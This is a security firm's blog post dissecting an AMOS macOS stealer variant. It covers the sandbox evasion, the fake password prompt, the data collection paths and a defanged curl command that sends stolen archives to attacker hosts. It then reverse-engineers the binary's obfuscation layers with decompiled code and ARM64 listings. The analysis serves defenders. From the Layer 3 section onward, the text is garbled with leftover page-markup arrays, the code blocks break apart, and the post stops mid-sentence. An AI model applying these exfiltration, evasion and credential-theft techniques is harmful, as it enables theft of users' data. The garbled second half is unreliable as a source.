# Anatomy of an Unknown AMOS Stealer: From Alert to Immunity in Hours

Pascal Asch, 2026-04-10

When an alert fires in our SOC, the clock starts. But not just for the affected customer, for every customer we protect. In the modern threat landscape, the most dangerous moment for any organization is the intelligence gap: that window of time between a new malware variant being deployed and the rest of the world finding out it exists.

For a standalone security team, this gap is a period of extreme vulnerability. You are essentially waiting for a vendor update or a public signature feed that hasn't been written yet. But for our customers, that gap is closed by the power of our in-house developed Shared Threat Intelligence.

This blog post is the technical breakdown of how we dismantled a previously undocumented AMOS (Atomic macOS Stealer) variant. It's a story of moving from a single compromised endpoint to rapid deployment of detection and blocking capabilities across customer environments.

---

# The Incident: An Unknown IOC Scenario

The alert arrived on March 12, 2026 at 06:25 local time. A macOS endpoint had been compromised. By the time our SOC began analysing the artefacts, we were looking at a situation every threat analyst dreads: no known file hashes, C2 IP addresses, or meaningful behavioral signatures existed in public databases at the time of detection.

The full architecture of the attack only became clear during the subsequent deep-dive analysis. We discovered that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. This sample was not readily available on the system; our team had to reconstruct the infection chain and simulate the original delivery request to manually retrieve the binary from the attacker's infrastructure.

---

## Stage 1: Sandbox checks

Before the malicious stealer itself was executed on the machine, an AppleScript payload had already executed. Every string in it, every file path, every shell command, every URL, was encoded using three custom arithmetic functions:

```text
on ipbgcjzgqa(a, b)
    -- result[i] = chr(a[i] - b[i])

on kwcvvjininv(a, b)
    -- result[i] = chr(a[i] + b[i])

on xqylheckjx(a, b, offset)
    -- result[i] = chr(a[i] - b[i] - offset)
```

None of the strings appear anywhere in plaintext. What looked like meaningless integer arrays at first glance decoded, once we had reversed the encoding scheme, to a complete, fully operational data theft and exfiltration framework.

We decoded every array in the script statically. The results were unambiguous:

```text
Download URL: https[:]//woupp[.]com/n8n/update
Exfil server: http[:]//92[.]246[.]136[.]14/contact
Exfil method: curl --connect-timeout 120 --max-time 300 -X POST -F "file=@/tmp/out.zip"
```

The download URL was deliberately crafted to impersonate a legitimate n8n workflow automation update, a tool commonly used by developers and DevOps engineers. This is not a random choice. It signals a targeted campaign aimed at technically sophisticated users, not generic end users who might install cracked software.

## The Anti-Sandbox Check

Before any download occurred, the script ran a dedicated VM and sandbox detection routine. We also recovered a standalone anti-sandbox script from the incident artefacts:

```applescript
set urgufr  to do shell script "system_profiler SPMemoryDataType"
set qcsvjxp to do shell script "system_profiler SPHardwareDataType"
```

The results were then checked against two lists. The first checked for virtualisation markers in memory data:

```text
"QEMU"   "VMware"   "KVM"
```

The second checked hardware identifiers against a set of known analysis machine serial numbers:

```text
"Z31FHXYQ0J"     -- known sandbox machine serial
"C07T508TG1J2"   -- known sandbox machine serial
"C02TM2ZBHX87"   -- known sandbox machine serial
"Chip: Unknown"  -- emulation indicator
"Intel Core 2"   -- legacy/VM indicator
```

If any match was found: `exit 100`, complete termination. On a real MacBook Pro with an Apple Silicon chip, all checks pass silently and execution continues. This is a professional-grade sandbox evasion technique, and it was running before a single byte of the binary had been downloaded.

## Simple but effective privilege escalation: The fake password dialog

The decoded script also contained the text used for privilege escalation via social engineering:

```text
Title:   "Application wants to install helper"
Prompt:  "Required Application Helper. Please enter device
          password to continue."
Button:  "Continue"
```

This dialog is displayed using a standard macOS `display dialog` call with `with hidden answer`, visually indistinguishable from a legitimate macOS authorisation prompt. The entered password was used to invoke `login -pf <username>`, elevating the process to root before the binary was ever executed.

## What the Script Collected

Once the binary had run, the osascript continued its own collection workflow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:

### Browser data (all Chromium browsers + Safari):

```text
/Login Data          /Cookies            /Web Data
/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/
```

### macOS Keychain:

```text
~/Library/Keychains/login.keychain-db  -- accessed directly via cat
```

### Apple Notes

Complete content exported as HTML with count header.

### Local files

Desktop and Documents, up to 30 MB, targeting:

```text
pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf
key  p12  pem  cert  pfx  sql  db  sqlite
json  xml  yaml  conf  env  csv
```

### Cryptocurrency wallets

A hardcoded list of **200+ browser extension IDs** targeting every major wallet including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, and Exodus.

After collection, everything was staged in a randomly-named temporary directory and sent:

```bash
ditto -c -k --sequesterRsrc <staging_dir> /tmp/out.zip
curl --connect-timeout 120 --max-time 300 -X POST \
  -H "user: <uuid>" -H "BuildID: <hw_profile>" \
  -F "file=@/tmp/out.zip" laislivon[.]com/contact
```

Cleanup followed immediately:

```bash
rm -r <staging_dir>
rm /tmp/out.zip
```

---

# Stage 2: Reverse Engineering the 'helper' Binary

The `helper` binary is where this analysis gets deep. This is a purpose-built, professionally obfuscated macOS executable designed to be as difficult as possible to analyse statically, and it is the part of this investigation that required the most significant reverse engineering effort.

All analysis was performed using Ghidra with our custom ARM64 analysis workflow.

## File Properties

| Property | Value |
|---|---|
| Format | Mach-O Universal Binary |
| Architectures | x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000) |
| Size | 15.7 MB |
| MD5 | `4599fdf2fa2099b30d8bbf76703dd634` |
| SHA-1 | `3992edfb6f885ae5f09f3e69a2578048d6d5bb54` |
| SHA-256 | `5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d` |

## It Starts Before main()

The first thing we confirmed in Ghidra was that this binary does not behave like a normal executable. The real entry point is not `main()`. It is a function registered in `__mod_init_func`, a macOS mechanism that instructs the dynamic linker (dyld) to execute designated functions automatically when the binary is loaded, before any user-visible code runs.

The init function at `0x10009f384` is the true entry point of the malware. We decompiled it with Ghidra:

```c
// FUN_10009f384 @ 0x10009f384
// __mod_init_func registered — executes before main()
void FUN_10009f384(void)
{
  int iVar1;

  // Anti-sandbox delay: usleep(0x37e) = 894 microseconds
  iVar1 = _usleep(0x37e);

  // Indirect jump table — 14-state machine
  // Defeats CFG reconstruction in static analysis tools
  (*(code *)((ulong)switchD_10009f43c::switchdataD_1000cd3fc * 4
             + 0x10009f440))(iVar1);
  return;
}
```

Two things are immediately notable. First, the 894-microsecond `usleep` at startup, an anti-sandbox timing signal. Second, and more significantly, the indirect jump table at `0x10009f43c`. This is a computed branch where the target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control flow graph from this; Ghidra itself logs multiple "unreachable block" warnings as it tries and fails to trace the execution path. This is deliberate.

The jump table drives a **14-state execution machine**. Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine loops until all states have executed.

## The ARM64 Disassembly of the State Dispatcher

```asm
10009f3fc:  stp xzr,xzr,[sp, #0x48]
10009f41c:  mov w0,#0x37e
10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox
10009f424:  cmp w25,#0xd             ; state counter < 14?
10009f428:  b.hi 0x10009fd44         ; exit if done
10009f42c:  mov w8,w25               ; current state index
10009f430:  adr x9,0x10009f440       ; base of jump table
10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table
10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address
10009f43c:  br x9                    ; indirect branch, CFG broken here
```

## Six Obfuscation Layers, Stacked

The binary uses six distinct obfuscation layers, stacked and chained so that the output of each feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the `__const` segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra, down to the individual ARM64 instructions. While each individual technique used in this binary is known in isolation, their chained application across multiple stages created a highly interdependent execution flow that significantly increased the complexity of static and dynamic analysis.

---

### Layer 1 — Compile-Time Triplet Encoding

Every string in the binary is stored not as characters, but as a sequence of 12-byte arithmetic triplets. Each triplet `(a, b, shift)` encodes exactly one output character. The encoding scheme is applied at compile time — meaning no string ever exists as plaintext in the binary, not even transiently during loading.

Two separate decoder functions handle different string sizes. `FUN_100087c08` at `0x100087c08` decodes 60-character strings (720 bytes of input data from `DAT_1006292cc`). `FUN_10007ad80` at `0x10007ad80` decodes 56-character strings (672 bytes from `DAT_10049708c`). Both use the identical algorithm.

```c
// FUN_100087c08 @ 0x100087c08
// Triplet decoder, 60 chars, data from DAT_1006292cc
void FUN_100087c08(long *param_1)
{
  long *plVar1;
  void *pvVar2;
  long lVar3;
  uint *puVar4;

  pvVar2 = operator_new(0x2d0);            // allocate 720 bytes (60 triplets × 12)
  _memcpy(pvVar2, &DAT_1006292cc, 0x2d0);  // copy encoded triplets from __const
  FUN_1000a0840(param_1, 0x3c, 0);         // init 60-char output buffer
  lVar3 = 0;
  puVar4 = (uint *)((long)pvVar2 + 8);     // points at 'shift' of the first triplet
  do {
    plVar1 = (long *)*param_1;
    if (-1 < *(char *)((long)param_1 + 0x17)) {
      plVar1 = param_1;
    }
    // THE DECODE FORMULA, one character per triplet:
    // char = (((b * 3) XOR a) >> shift) - b
    // puVar4[-2] = a, puVar4[-1] = b, *puVar4 = shift
    *(char *)((long)plVar1 + lVar3) =
        (char)((int)(puVar4[-1] * 3 ^ puVar4[-2]) >> (*puVar4 & 0x1f))
        - (char)puVar4[-1];
    lVar3 = lVar3 + 1;
    puVar4 = puVar4 + 3;                   // advance 12 bytes — next triplet
  } while (lVar3 != 0x3c);                 // loop exactly 60 times
  operator_delete(pvVar2);
  return;
}
```

And the corresponding ARM64 assembly, where each instruction maps directly to one operation in the formula:

```asm
100087c48:  add x9,x20,#0x8
100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11
100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b << 1) = b * 3
                                      ; (compiler avoids MUL instruction)
100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a
100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12
100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved
100087c60:  sub w10,w10,w11           ; subtract b — final decoded character
100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer
100087c78:  add x8,x8,#0x1
100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60
100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded
```

One detail worth noting: the multiplication `b × 3` is implemented as `add w12, w11, w11, LSL #1`, a shift-and-add that avoids a multiplication instruction entirely. This is a classic compiler optimisation that also makes the code harder to pattern-match in signature databases.

The complete decode formula:

```text
char = ASR( (b × 3) XOR a, shift ) − b
```

The `ASR` (arithmetic shift right) is critical. It preserves the sign bit. If the intermediate result of `(b×3) XOR a` is negative, which it frequently is, a logical shift would produce a different result entirely. This is intentional, and means that simply reimplementing the formula with `>>` in a higher-level language will silently produce wrong output unless the signed arithmetic is handled correctly.

The 56-character variant `FUN_10007ad80` is structurally identical, operating on `DAT_10049708c` with a loop limit of `0x38`. Both functions were confirmed live from Ghidra during this analysis.

---

### Layer 2 — Hex String Encoding

The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. The output of a Layer 1 triplet decode is a string of hex pairs: `32694e5462...`. This is confirmed by the decoder function `FUN_100000dc0` at `0x100000dc0`, which implements a hex-decode using a lookup table at `DAT_1007bb591`.

The Ghidra decompile shows a switch statement mapping each hex character (`0x30`-`0x39`, `0x41`-`0x46`, `0x61`-`0x66`) to its nibble value, assembling output bytes two characters at a time:

```c
// FUN_100000dc0 @ 0x100000dc0
// Hex decoder, processes input two characters per output byte
switch(*(undefined1 *)((long)plVar2 + lVar7)) {
  case 0x30: break;                           // '0' → 0x00
  case 0x31: bVar9 = 0x10; break;             // '1' → 0x10
  case 0x32: bVar9 = 0x20; break;             // '2' → 0x20
  // ... '3' through '9' ...
  case 0x41: case 0x61: bVar9 = 0xa0; break;  // 'A'/'a' → 0xa0
  case 0x42: case 0x62: bVar9 = 0xb0; break;  // 'B'/'b' → 0xb0
  case 0x43: case 99:   bVar9 = 0xc0; break;  // 'C'/'c' → 0xc0
  case 0x44: case 100:  bVar9 = 0xd0; break;  // 'D'/'d' → 0xd0
  case 0x45: case 0x65: bVar9 = 0xe0; break;  // 'E'/'e' → 0xe0
  case 0x46: case 0x66: bVar9 = 0xf0; break;  // 'F'/'f' → 0xf0
}
// Second nibble from lookup table at DAT_1007bb591
*(byte *)((long)pppppppuVar3 + uVar8) =
    (&DAT_1007bb591)[(ulong)uVar4 & 0xff] | bVar9;
```

The ARM64 assembly drives this with a secondary computed-branch table, effectively implementing a 55-entry jump table for the switch:

```asm
100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table
100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char
100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address
100000e68:  br x17                   ; jump — second computed branch in 24 bytes
```

Two computed branches within a 24-byte window. Static analysis tools struggle badly with this pattern because both targets are unknown at analysis time.

A 137,208-character hex string decodes to 68,604 bytes. These 68,604 bytes then feed Layer 3.

---

### Layer 3 — Custom 16-Symbol Nibble Alphabet

The 68,604 output bytes from Layer 2 use only 16 unique byte values, drawn from two non-contiguous ASCII ranges:

- `0x20-0x2F`: space, `!`, `"`, `#`, `$`, `%`, `&`, `'`, `(`, `)`, `*`, `+`, `,`, `-`, `.`, `/`
- `0x78-0x7F`: `x`, `y`, `z`, `{`, `|`, `}`, `~`, DEL

This is a deliberate choice. In a hex editor, these bytes look like whitespace, punctuation, and end-of-ASCII-range characters — they blend into what looks like metadata or padding, not encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also undercount the effective entropy because the byte distribution appears non-random.

Each byte from this alphabet encodes one nibble of the actual payload. The alphabet-to-nibble mapping is applied by the encode/decode function `FUN_100000d60`, which we confirmed at `0x100000d60`. It chains two sub-functions: `FUN_100000b50` builds an indexed map of the input string's characters, and `FUN_100000c34` walks this map, consuming 6 bits per step and accumulating output bytes 8 bits at a time:

```c
// FUN_100000c34 @ 0x100000c34, nibble accumulator
iVar5 = 0;
do {
  local_52 = *(undefined1 *)puVar4;
  lVar3 = FUN_1000a078c(param_3, &local_52);  // look up nibble value
  if (lVar3 == 0) {
    // character not in alphabet, treat as raw
    FUN_1000a078c(param_3, &local_51);
  } else {
    iVar5 = iVar5 + 2;                        // accumulate 4 bits
    while (7 < iVar5) {
      std::string::push_back((char)param_1);  // emit byte when 8+ bits ready
      iVar5 = iVar5 + -8;
    }
  }
  puVar4 = (undefined8 *)((long)puVar4 + 1);
} while (puVar4 != puVar1);
```

The 34,302 bytes that emerge from this pass are 99.7% printable ASCII; the payload at this stage looks like a large shell script or configuration blob to a superficial
inspection.",[22,1437],{},[186,1439,1441],{"id":1440},"layer-4-compile-time-string-obfuscation","Layer 4, Compile-Time String Obfuscation",[12,1443,192],{},[12,1445,1446],{},"Short strings used internally are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory, they are consumed by the next operation and then the buffer is freed. At no point is a decoded string visible in the binary's static data sections.",[12,1448,1449,1450,1453],{},"The string hash function ",[63,1451,1452],{},"FUN_100000730"," provides a secondary obfuscation layer for string comparisons. Rather than comparing strings directly, which would leave plaintext in memory for pattern-matching, the binary computes and compares integer hashes:",[52,1455,1456],{"style":54},[524,1457,1458,1461,1464,540,1466,545,1468,757,1470,1472,1473,1476,1477,420,1480,420,1483,1486,1487,1489,1490,1492,1493,1495,1496,1114,1499,1502,1503,1505,1506,1508],{},[102,1459,1460],{"style":528},"// FUN_100000730 @ 0x100000730",[102,1462,1463],{"style":528},"// FNV-style string hash, avoids plaintext string comparisons",[102,1465,551],{"style":538},[102,1467,1452],{"style":543},[102,1469,843],{"style":538},[102,1471,551],{"style":538}," iVar4 = ",[102,1474,1475],{"style":564},"0x19a8",";    ",[102,1478,1479],{"style":528},"// FNV offset basis (modified)",[102,1481,1482],{"style":528},"// ...",[102,1484,1485],{"style":538},"for"," (; uVar3 != ",[102,1488,808],{"style":564},"; uVar3 = uVar3 - ",[102,1491,839],{"style":564},") {\n    iVar4 = (",[102,1494,551],{"style":538},")*pcVar1 + iVar4 * -",[102,1497,1498],{"style":564},"0x7fb91be3",[102,1500,1501],{"style":528},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[102,1504,839],{"style":564},";\n  }\n  ",[102,1507,593],{"style":538}," iVar4;\n}\n",[12,1510,1511],{},"The ARM64 implementation replaces the multiply with a fused 
multiply-add:",[52,1513,1514],{"style":54},[56,1515,1518],{"className":1516,"code":1517,"language":61},[59],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[63,1519,1517],{"__ignoreMap":65},[12,1521,1522],{},"This means that even comparing two strings inside the binary never produces a branch that a debugger can intercept cleanly at the string level — only at the hash level.",[22,1524],{},[186,1526,1528],{"id":1527},"layer-5-dual-instance-custom-stream-cipher","Layer 5 — Dual-Instance Custom Stream Cipher",[12,1530,192],{},[12,1532,1533,1534,1537],{},"This is where the obfuscation architecture becomes genuinely unusual. There are not one but ",[251,1535,1536],{},"two separate cipher instances"," running in the binary, each with a different hardcoded lookup table and a different starting counter. 
Both use the same algorithm structure, but they produce different output alphabets for different parts of the payload pipeline.",[12,1539,1540,1543,1544,718,1547,1550],{},[251,1541,1542],{},"Instance A"," — ",[63,1545,1546],{},"FUN_10007ab34",[63,1548,1549],{},"0x10007ab34",":",[52,1552,1553],{"style":54},[524,1554,1555,1558,1559,1364,1562,1564,1565,578,1567,1569,1570,1572,1573,578,1575,1577,1578,1580,1581,578,1583,1585,1586,1588,1589,1592,1593,1595,1596,1598],{},[102,1556,1557],{"style":528},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[102,1560,1561],{"style":564},"0x4c",[102,1563,828],{"style":538}," {\n  bVar2 = *(",[102,1566,1214],{"style":538},[102,1568,756],{"style":538},")local_e0 +\n          ((",[102,1571,581],{"style":538},")(*(",[102,1574,1214],{"style":538},[102,1576,756],{"style":538},")local_c8 + uVar5) ^ uVar6) & ",[102,1579,1223],{"style":564},"));\n  *(",[102,1582,1214],{"style":538},[102,1584,756],{"style":538},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[102,1587,551],{"style":538},")uVar5 + (uVar6 ^ bVar2);  ",[102,1590,1591],{"style":528},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[102,1594,839],{"style":564},";\n} ",[102,1597,912],{"style":538}," (uVar7 != uVar5);\n",[12,1600,1601,805,1604,718,1607,1550],{},[251,1602,1603],{},"Instance B",[63,1605,1606],{},"FUN_10007a7e0",[63,1608,1609],{},"0x10007a7e0",[52,1611,1612],{"style":54},[524,1613,1614,1558,1617,1364,1620,1564,1622,578,1624,1626,1627,1572,1629,578,1631,1633,1634,1580,1636,578,1638,1585,1640,1588,1642,1592,1645,1595,1647,1598],{},[102,1615,1616],{"style":528},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[102,1618,1619],{"style":564},"0x9f",[102,1621,828],{"style":538},[102,1623,1214],{"style":538},[102,1625,756],{"style":538},")local_c0 +\n          ((",[102,1628,581],{"style":538},[102,1630,1214],{"style":538},[102,1632,756],{"style":538},")local_a8 + uVar5) ^ uVar6) & 
",[102,1635,1223],{"style":564},[102,1637,1214],{"style":538},[102,1639,756],{"style":538},[102,1641,551],{"style":538},[102,1643,1644],{"style":528},"// identical counter update formula",[102,1646,839],{"style":564},[102,1648,912],{"style":538},[12,1650,1651,1652,1654,1655,1657],{},"The algorithm is structurally identical but the starting counter differs (",[63,1653,1561],{}," vs ",[63,1656,1619],{},") and the lookup tables are at different memory addresses. Instance A is called from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is called from state 6 to produce the alphabet for the large shell script payload decode.",[12,1659,1660,1661,1664,1665,1668,1669,1672],{},"To be precise about what this cipher is: it is a ",[251,1662,1663],{},"substitution cipher with a counter-dependent index",". Each output byte is a table lookup where the index is ",[63,1666,1667],{},"(input_byte XOR counter) & 0xFF",". The counter updates as ",[63,1670,1671],{},"counter = (i + (counter XOR output)) & 0xFF"," after each byte, meaning each output byte feeds back into determining the next lookup index. This creates a dependency chain across the entire output sequence: you cannot decrypt byte N without having correctly decrypted bytes 0 through N−1. This property makes partial decryption or fault analysis significantly harder.",[12,1674,1675],{},"Neither instance is standard RC4. There is no S-Box initialisation phase and no S-Box swap operation. The lookup tables are static, pre-computed constants baked into the binary at compile time.",[22,1677],{},[186,1679,1681],{"id":1680},"layer-6-runtime-xor-with-exit-code-dependent-key","Layer 6 — Runtime XOR with Exit-Code Dependent Key",[12,1683,192],{},[12,1685,1686,1687,1690],{},"The final and most analytically defeating layer applies an in-place XOR transformation to the Stage 2 payload. The XOR key is not hardcoded. 
It is computed at runtime from the exit code of the ",[251,1688,1689],{},"first shell payload execution",", meaning it cannot be determined by any form of static analysis. The binary must actually execute, the first shell script must run to completion, and only then does the key exist.",[12,1692,1693],{},"The key derivation sequence in the ARM64 state machine dispatcher:",[52,1695,1696],{"style":54},[56,1697,1700],{"className":1698,"code":1699,"language":61},[59],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[63,1701,1699],{"__ignoreMap":65},[12,1703,1704],{},"The XOR loop that processes the Stage 2 payload:",[52,1706,1707],{"style":54},[56,1708,1711],{"className":1709,"code":1710,"language":61},[59],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[63,1712,1710],{"__ignoreMap":65},[12,1714,1715,1716,1719,1720,1723,1724,1726],{},"The key is a 16-bit value derived from the exit status byte of the first shell payload, multiplied by ",[63,1717,1718],{},"0x7f0"," and added to the current value of the state machine's base counter register ",[63,1721,1722],{},"w26",". The multiplication constant ",[63,1725,1718],{}," means that even a single-bit difference in the exit code produces a completely different key, there is no exploitable continuity between adjacent key values.",[12,1728,1729],{},"Without executing the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload is permanently opaque to static analysis. 
This is the single hardest barrier we encountered in this entire analysis.",[22,1731],{},[41,1733,1735],{"id":1734},"shell-execution-pipes-not-arguments-and-simd-xor","Shell Execution: Pipes, Not Arguments, and SIMD XOR",[12,1737,47],{},[12,1739,1740,1741,718,1744,1747],{},"The shell execution function ",[63,1742,1743],{},"FUN_10000091c",[63,1745,1746],{},"0x10000091c"," is architecturally the most interesting piece of the binary. It is where everything comes together, the decoded payload, the obfuscated command name, and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.",[186,1749,1751],{"id":1750},"step-1-the-command-name-is-never-in-plaintext","Step 1: The command name is never in plaintext",[12,1753,192],{},[12,1755,1756,1757,1760,1761,1764,1765,1768,1769,1772],{},"The string ",[63,1758,1759],{},"/bin/zsh"," does not exist anywhere in the binary. It is stored in the ",[63,1762,1763],{},"__cstring"," section at ",[63,1766,1767],{},"0x1007bb5c8"," as the obfuscated bytes ",[63,1770,1771],{},"\\x01LG@\\x01T]F",". 
The decoding happens at runtime using a single XOR operation, confirmed directly in the ARM64 assembly:",[52,1774,1775],{"style":54},[56,1776,1779],{"className":1777,"code":1778,"language":61},[59],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[63,1780,1778],{"__ignoreMap":65},[12,1782,1783,1784,1787,1788,1790,1791,1794],{},"The XOR key is ",[63,1785,1786],{},"0x2e",", the ASCII value of ",[63,1789,1013],{}," (period). The decode is performed in a single ",[63,1792,1793],{},"eor v0.8B, v0.8B, v1.8B",", an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. 
Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decode loops will not flag.",[12,1796,1797,1798,805,1801,805,1804,805,1807,1810,1811,1814],{},"The verification is trivial: ",[63,1799,1800],{},"0x01 XOR 0x2e = 0x2f = /",[63,1802,1803],{},"0x4c XOR 0x2e = 0x62 = b",[63,1805,1806],{},"0x47 XOR 0x2e = 0x69 = i",[63,1808,1809],{},"0x40 XOR 0x2e = 0x6e = n"," — producing ",[63,1812,1813],{},"/bin"," in the first four bytes.",[186,1816,1818],{"id":1817},"step-2-the-pipe-architecture","Step 2: The pipe architecture",[12,1820,192],{},[12,1822,1823],{},"After decoding the command name, the function creates an OS pipe and forks:",[52,1825,1826],{"style":54},[56,1827,1830],{"className":1828,"code":1829,"language":61},[59],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[63,1831,1829],{"__ignoreMap":65},[12,1833,1834],{},"In the child process:",[52,1836,1837],{"style":54},[56,1838,1841],{"className":1839,"code":1840,"language":61},[59],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[63,1842,1840],{"__ignoreMap":65},[12,1844,1845,1846,1849,1850,1853,1854,1856],{},"The child replaces its standard input with the read end of the pipe, then executes ",[63,1847,1848],{},"/bin/zsh -s",". The shell in ",[63,1851,1852],{},"-s"," mode reads commands from stdin. 
From a process monitoring perspective, this process appears as ",[63,1855,1848],{}," with no arguments — which is indistinguishable from a legitimate interactive shell session.",[186,1858,1860],{"id":1859},"step-3-variable-size-chunk-writes","Step 3: Variable-size chunk writes",[12,1862,192],{},[12,1864,1865],{},"The parent process writes the decrypted payload to the pipe write end in deliberately variable-sized chunks:",[52,1867,1868],{"style":54},[56,1869,1872],{"className":1870,"code":1871,"language":61},[59],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[63,1873,1871],{"__ignoreMap":65},[12,1875,1876,1877,1880,1881,1884,1885,1888,1889,1892],{},"The chunk size formula ",[63,1878,1879],{},"(remaining_length % 192) + 64"," produces values between 64 and 255 bytes per write call, varying with the remaining payload length. This variable-chunk approach means that the write pattern, visible in kernel event tracing tools like ",[63,1882,1883],{},"ktrace"," or ",[63,1886,1887],{},"dtrace",", does not produce a recognisable fixed-size signature. 
Each execution of the same payload produces a different sequence of ",[63,1890,1891],{},"write()"," syscall sizes.",[12,1894,1895,1896,1898],{},"The 1-microsecond ",[63,1897,600],{}," between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU utilisation flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.",[186,1900,1902],{"id":1901},"step-4-immediate-memory-wipe","Step 4: Immediate memory wipe",[12,1904,192],{},[52,1906,1907],{"style":54},[56,1908,1911],{"className":1909,"code":1910,"language":61},[59],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[63,1912,1910],{"__ignoreMap":65},[12,1914,399,1915,1918],{},[63,1916,1917],{},"_bzero()"," call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no point in time, not even a microsecond, where the decrypted payload exists in memory after execution is complete. A live memory dump taken the instant after this function returns will find only zeroes where the payload 